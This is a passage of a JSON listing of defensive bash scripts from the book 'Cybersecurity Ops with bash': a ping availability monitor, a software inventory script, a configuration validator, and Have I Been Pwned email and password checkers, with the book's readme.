    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# pingmonitor.sh\n#\n# Description: \n# Use ping to monitor host availability\n#\n# Usage:\n# pingmonitor.sh <file> <seconds>\n#   <file> File containing a list of hosts\n#   <seconds> Number of seconds between pings\n#\n\nwhile true\ndo\n clear\t\n echo 'Cybersecurity Ops System Monitor'\n echo 'Status: Scanning ...'\n echo '-----------------------------------------'\n while read -r ipadd \n do\n  ipadd=$(echo \"$ipadd\" | sed 's/\\r//')   #<1>\n  ping -n 1 \"$ipadd\" | egrep '(Destination host unreachable|100%)' &> /dev/null   #<2>\n  if (( \"$?\" == 0 ))   #<3>\n  then\n   tput setaf 1\t#<4>\n   echo \"Host $ipadd not found - $(date)\" | tee -a monitorlog.txt   #<5>\n   tput setaf 7\n  fi\n done < \"$1\"\n\t\n echo \"\"\n echo \"Done.\"\n\n for ((i=\"$2\"; i > 0; i--))   #<6>\n do\n  tput cup 1 0   #<7>\n  echo \"Status: Next scan in $i seconds\"\n  sleep 1\n done\t\ndone\n \n"
  },
  {
    "path": "ch20/softinv.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# softinv.sh\n#\n# Description: \n# list the software installed on a system\n# for later aggregation and analysis;\n#\n# Usage: ./softinv.sh [filename]\n# output is written to $1 or <hostname>_softinv.txt\n# \n\n# set the output filename\nOUTFN=\"${1:-${HOSTNAME}_softinv.txt}\"\t\t\t\t# <1>\n\n# which command to run depends on the OS and what's there\nOSbase=win\ntype -t rpm &> /dev/null\t\t\t\t\t# <2>\n(( $? == 0 )) && OSbase=rpm\t\t\t\t\t# <3>\ntype -t dpkg &> /dev/null\n(( $? == 0 )) && OSbase=deb\ntype -t apt &> /dev/null\n(( $? == 0 )) && OSbase=apt\n\ncase ${OSbase} in\t\t\t\t\t\t# <4>\n    win)\n\tINVCMD=\"wmic product get name,version //format:csv\"\n\t    ;;\n    rpm)\n    \tINVCMD=\"rpm -qa\"\n\t    ;;\n    deb)\n\tINVCMD=\"dpkg -l\"\n\t    ;;\n    apt)\n    \tINVCMD=\"apt list --installed\"\n\t    ;;\n    *)\n    \techo \"error: OSbase=${OSbase}\"\n\texit -1\n\t    ;;\nesac\n\n#\n# run the inventory\n#\n$INVCMD 2>/dev/null > $OUTFN\t\t\t\t\t# <5>\n\n"
  },
  {
    "path": "ch21/test.input",
    "content": "file  ./TODO.txt\n!file  ./validate.sh\n!file nogo.sh\nuser albing\n!user bob\ngroup mysql\n!group skip\nhash a7f36f4519661cf2aaaf0ebf057f768fc35dafe8  validate.sh\nhash b79f70b18538de0199e6829e06b547e079df8842  /bin/ls\n"
  },
  {
    "path": "ch21/validateconfig.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# validateconfig.sh\n#\n# Description: \n# Validate a specified configuration exists\n#\n# Usage:\n# validateconfig.sh < configfile\n#\n# configuration specification looks like:\n# [[!]file|hash|reg|[!]user|[!]group] [args]\n# examples:\n# file /usr/local/bin/sfx \t\t- file exists\n# hash 12384970347 /usr/local/bin/sfx   - file has this hash\n# !user bono\t\t\t\t- no user \"bono\" allowed\n# group students\t\t\t- must have a students group\n#\n# errexit - show correct usage and exit\nfunction errexit ()\n{\n    echo \"invalid syntax at line $ln\"\n    echo \"usage: [!]file|hash|reg|[!]user|[!]group [args]\"    # <1>\n    exit 2\n\n} # errexit\n\n# vfile - validate the [non]existence of filename\n#\targs: 1: the \"not\" flag - value:1/0 \n#             2: filename\n#\nfunction vfile ()\n{\n    local isThere=0\n    [[ -e $2 ]] && isThere=1                    # <2>\n    (( $1 )) && let isThere=1-$isThere          # <3>\n\n    return $isThere\n\n} # vfile\n\n# verify the user id\nfunction vuser ()\n{\n    local isUser\n    $UCMD $2 &>/dev/null\n    isUser=$?\n    if (( $1 ))                                 # <4>\n    then\n        let isUser=1-$isUser\n    fi\n\n    return $isUser\n\n} # vuser\n\n# verify the group id\nfunction vgroup ()\n{\n    local isGroup\n    id $2 &>/dev/null\n    isGroup=$?\n    if (( $1 ))\n    then\n        let isGroup=1-$isGroup\n    fi\n\n    return $isGroup\n\n} # vgroup\n\n# verify the hash on the file\nfunction vhash ()\n{\n    local res=0\n    local X=$(sha1sum $2)                       # <5>\n    if [[ ${X%% *} == $1 ]]                     # <6>\n    then\n        res=1\n    fi\n\n    return $res\n\n} # vhash\n\n# a windows system registry check\nfunction vreg ()\n{\n    local res=0\n    local keypath=$1\n    local value=$2\n    local expected=$3\n    local REGVAL=$(query $keypath //v $value)\n\n    if [[ $REGVAL == $expected ]]\n    then\n        res=1\n    fi\n    return 
$res\n\n} # vreg\n\n#\n# main\n#\n\n# do this once, for use in verifying user ids\nUCMD=\"net user\"\ntype -t net &>/dev/null  || UCMD=\"id\"           # <7>\n\nln=0\nwhile read cmd args\ndo\n    let ln++\n\n    donot=0\n    if [[ ${cmd:0:1} == '!' ]]                  # <8>\n    then\n        donot=1\n\tbasecmd=${cmd#\\!}                       # <9>\n    fi\n\n    case \"$basecmd\" in\n    file)\n        OK=1\n        vfile $donot \"$args\"\n        res=$?\n        ;;\n    hash)\n        OK=1\n\t# split args into 1st word , remainder\n        vhash \"${args%% *}\" \"${args#* }\"        # <10>\n        res=$?\n        ;;\n    reg)\n        # Windows Only!\n        OK=1\n        vreg $args\n        res=$?\n        ;;\n    user)\n        OK=0\n        vuser $args\n        res=$?\n        ;;\n    group)\n        OK=0\n        vgroup $args\n        res=$?\n        ;;\n    *)  errexit\t\t\t\t\t# <11>\n        ;;\n    esac\n    \n    if (( res != OK )) \n    then\n        echo \"FAIL: [$ln] $cmd $args\"\n    fi\ndone\n\n"
  },
  {
    "path": "ch22/checkemail.1liner",
    "content": "#!/bin/bash\n#\n# checkemail.sh - check an email address against\n#                 the Have I Been Pwned? database\n#\t\t  in 1 line\n\nEMAILIN=\"$1\"\nif (( \"$#\" == 0 ))                     #<1>\nthen\n    printf 'Enter email address: '\n    read EMAILIN\nfi\nEMAILIN=\"https://haveibeenpwned.com/api/v2/breachedaccount/$EMAILIN\"\n\necho 'Account pwned in the following breaches:'\ncurl -s \"$EMAILIN\" | grep -Po '\"Name\":\".*?\"' | cut -d':' -f2 | tr -d '\\\"'  #<2>\n"
  },
  {
    "path": "ch22/checkemail.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# checkemail.sh\n#\n# Description: \n# check an email address against the\n# Have I Been Pwned? database\n#\n# Usage: ./checkemail.sh [<email>]\n#   <email> Email address to check; default: reads from stdin\n#\n\nif (( \"$#\" == 0 ))\t#<1>\nthen\n\tprintf 'Enter email address: '\n\tread emailin\nelse\n\temailin=\"$1\"\nfi\n\npwned=$(curl -s \"https://haveibeenpwned.com/api/v2/breachedaccount/$emailin\")\t#<2>\n\nif [ \"$pwned\" == \"\" ]\nthen\n\texit 1\nelse\n\techo 'Account pwned in the following breaches:'\n\techo \"$pwned\" | grep -Po '\"Name\":\".*?\"' | cut -d':' -f2 | tr -d '\\\"'\t#<3>\n\texit 0\nfi\n\n"
  },
  {
    "path": "ch22/checkemailAlt.sh",
    "content": "#!/bin/bash\n#\n# checkemail.sh - check an email address against\n#                 the Have I Been Pwned? database\n#\n\nif (( \"$#\" == 0 ))                     #<1>\nthen\n    printf 'Enter email address: '\n    read emailin\nelse\n    emailin=\"$1\"\nfi\n\nURL=\"https://haveibeenpwned.com/api/v2/breachedaccount/$emailin\"\npwned=$(curl -s \"$URL\" |  grep -Po '\"Name\":\".*?\"' )   #<2>\n\nif [ \"$pwned\" == \"\" ]\nthen\n    exit 1\nelse\n    echo 'Account pwned in the following breaches:'   # <3>\n    pwned=\"${pwned//\\\"/}\"         # remove all quotes\n    pwned=\"${pwned//Name:/}\"      # remove all 'Name:'\n    echo \"${pwned}\"\n    exit 0\nfi\n"
  },
  {
    "path": "ch22/checkpass.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# checkpass.sh\n#\n# Description: \n# Check a password against the\n# Have I Been Pwned? database\n#\n# Usage: ./checkpass.sh [<password>]\n#   <password> Password to check\n#   default: read from stdin\n#   note: a password given as an argument can appear in shell history and\n#   the process list; the prompt (no argument) avoids this\n#\n\nif (( \"$#\" == 0 ))                              #<1>\nthen\n    printf 'Enter your password: '\n    read -s passin                              #<2>\n\techo\nelse\n    passin=\"$1\"    \nfi\n\npassin=$(echo -n \"$passin\" | sha1sum)\t          #<3>\npassin=${passin:0:40}\n\nfirstFive=${passin:0:5}                         #<4>\nending=${passin:5}\n\npwned=$(curl -s \"https://api.pwnedpasswords.com/range/$firstFive\" | \\\n        tr -d '\\r' | grep -i \"$ending\" )        #<5>\npasswordFound=${pwned##*:}                      #<6>\n\n\nif [ \"$passwordFound\" == \"\" ]\nthen\n    exit 1\nelse\n    printf 'Password is Pwned %d Times!\\n' \"$passwordFound\"\n    exit 0\nfi\n\n"
  },
  {
    "path": "ch22/emailbatch.sh",
    "content": "#!/bin/bash -\n#\n# Cybersecurity Ops with bash\n# emailbatch.sh\n#\n# Description: \n# Read in a file of email addresses and run them\n# against Have I Been Pwned\n#\n# Usage: ./emailbatch.sh [<filename>]\n#   <filename> File with one email address on each line\n#   default: reads from stdin\n#\n\ncat \"$1\" | tr -d '\\r' | while read fileLine\t\t#<1>\ndo\t\n\t./checkemail.sh \"$fileLine\" > /dev/null\t#<2>\n\t\n\tif (( \"$?\" == 0 ))\t#<3>\n\tthen\n\t\techo \"$fileLine is Pwned!\"\n\tfi\n\t\n\tsleep 0.25\t\t#<4>\ndone\n"
  },
  {
    "path": "readme.txt",
    "content": "Cybersecurity Ops with bash\nAttack, Defend, and Analyze from the Command Line\n----------------------------------------------------------------------------------------\n                                   Scripts Version 1.0\n----------------------------------------------------------------------------------------\n\nAbout\n----------------------------------------------------------------------------------------\nAll of the scripts and data referenced in the book are included with this file. The\nnumber tags (e.g. <1>, <2>, <3>) contained in each script file correspond to the\nnumbered callout explanations from within the book.\n\n\nScript Robustness\n----------------------------------------------------------------------------------------\nThe included scripts are written to illustrate and teach concepts. The\nscripts are not designed to be efficient or robust enough for enterprise deployment.\nUse caution if you choose to use the scripts in a live environment. Be sure to follow\nprogramming best practices and test your scripts before deployment.\n\n\nDisclaimer\n----------------------------------------------------------------------------------------\nThe included scripts are provided \"as is\" and without any warranties or guarantees.\n\n----------------------------------------------------------------------------------------\n                                https://www.rapidcyberops.com\n----------------------------------------------------------------------------------------"
  }
]